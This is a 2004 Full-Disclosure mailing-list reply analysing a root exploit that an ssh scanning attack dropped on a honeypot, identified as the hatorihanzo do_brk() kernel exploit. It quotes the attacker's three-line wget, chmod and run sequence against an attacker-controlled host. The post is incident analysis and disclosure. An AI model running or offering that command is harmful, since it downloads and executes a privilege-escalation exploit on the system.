Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning

[Andrew Farmer <andfarm@xxxxxxxxxxxx>]

On 26 Aug 2004, at 14:12, Blue Boar wrote:
> Todd Towles wrote:
> > It could be, but he said it was patched. I didn't run the test of
> > course. I never said it was the kernel however, it could be a service 
> > running.
> > And unknown does not equal zero-day. But the tool got root and he
> > doesn't know how. That is the point. Kernel, old service, whatever. It
> > would be nice to find it.
>
> If you take a look at this bit:
>
> wget www.bo2k-rulez.net/a
> chmod +x a
> ./a
>
> The file "a" gives every superficial indication that it's a kernel 
> exploit, if you want to go by a 20-second Notepad analysis:

Whatever it is, it doesn't work under 2.6.7:

        peon % ./a
(long pause)
        [-] Unable to determine kernel address: Operation not supported
        zsh: segmentation fault  ./a
        peon %

It may, however, have corrupted some binaries, including /bin/rm and 
/bin/sync, causing
them to crash (SIGSEGV) on invocation. Fortunately, I was working in a 
(honeypot-mode)
UML, so my main system's fine :-)

Strings in the binary match 
http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php ,
which is an oldish do_brk() exploit. For the curious, though, a trimmed 
dissasembly
is attached. (I removed portions of the binary which looked like they 
were from
libraries.) The symbol names all match up, so I'm pretty confident 
they're the same
code.

Attachment: a.objdump.gz
Description: GNU Zip compressed data

Looks like that Debian honeypot wasn't as up-to-date as hoped.

Attachment: PGP.sig
Description: This is a digitally signed message part